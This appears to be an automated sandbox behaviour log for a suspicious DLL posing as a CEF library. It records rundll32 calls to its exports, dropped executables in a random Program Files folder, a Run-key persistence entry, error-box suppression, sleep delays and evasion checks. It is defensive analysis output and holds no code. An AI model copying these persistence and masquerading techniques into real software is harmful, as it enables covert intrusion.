Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\0Gs0WEGB1E.dll,cef_clear_scheme_handler_factories
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\0Gs0WEGB1E.dll,cef_command_line_create
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_clear_cross_origin_whitelist
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_clear_scheme_handler_factories
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_command_line_create
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",you
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",create_context_shared
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_zip_reader_create
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_zip_directory
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_write_json
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_window_create_top_level
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_visit_web_plugin_info
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_value_create
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8value_create_undefined
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8value_create_uint
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8value_create_string
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8value_create_object
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8value_create_null
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8value_create_int
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8value_create_function
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8value_create_double
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8value_create_date
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8value_create_bool
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8value_create_array_buffer
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8value_create_array
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8stack_trace_get_current
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8context_in_context
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8context_get_entered_context
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8context_get_current_context
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_urlrequest_create
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_uriencode
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_uridecode
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_unregister_internal_web_plugin
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_time_to_timet
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_time_now
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_time_delta
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",#1Jump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\0Gs0WEGB1E.dll,cef_clear_cross_origin_whitelistJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\0Gs0WEGB1E.dll,cef_clear_scheme_handler_factoriesJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\0Gs0WEGB1E.dll,cef_command_line_createJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_clear_cross_origin_whitelistJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_clear_scheme_handler_factoriesJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_command_line_createJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",youJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",create_context_sharedJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_zip_reader_createJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_zip_directoryJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_write_jsonJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_window_create_top_levelJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_visit_web_plugin_infoJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_value_createJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8value_create_undefinedJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8value_create_uintJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8value_create_stringJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8value_create_objectJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8value_create_nullJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8value_create_intJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8value_create_functionJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8value_create_doubleJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8value_create_dateJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8value_create_boolJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8value_create_array_bufferJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8value_create_arrayJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8stack_trace_get_currentJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8context_in_contextJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8context_get_entered_contextJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8context_get_current_contextJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_urlrequest_createJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_uriencodeJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_uridecodeJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_unregister_internal_web_pluginJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_time_to_timetJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_time_nowJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_time_deltaJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",#1Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: 0Gs0WEGB1E.dllStatic PE information: More than 146 > 100 exports found
Source: 0Gs0WEGB1E.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
Source: Binary string: D:\a\_work\1\s\\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: VCRUNTIME140.dll.10.dr
Source: Binary string: d:\a01\_work\2\s\\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: MSVCP140.dll.10.dr
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E3436B0 LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_6E3436B0
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E343F76 push ecx; ret 0_2_6E343F89
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E33F175 push ecx; ret 0_2_6E33F188
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Program Files (x86)\mRiZvH\FileSystem_Stdio.dllJump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Program Files (x86)\mRiZvH\MSVCP140.dllJump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Program Files (x86)\mRiZvH\VCRUNTIME140.dllJump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Program Files (x86)\mRiZvH\RVQwATT.exeJump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WINDOWSJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WINDOWSJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Program Files (x86)\mRiZvH\FileSystem_Stdio.dllJump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Program Files (x86)\mRiZvH\MSVCP140.dllJump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Program Files (x86)\mRiZvH\VCRUNTIME140.dllJump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Program Files (x86)\mRiZvH\RVQwATT.exeJump to dropped file
Source: C:\Windows\System32\loaddll32.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_0-9904
Source: C:\Windows\System32\loaddll32.exeAPI coverage: 1.6 %
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7904Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: rundll32.exe, 0000000A.00000002.2084091302.0000000003251000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1834552528.0000000003251000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1876290454.0000000003251000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1805751796.000000000324F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1867581832.0000000003251000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1805543370.0000000003248000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
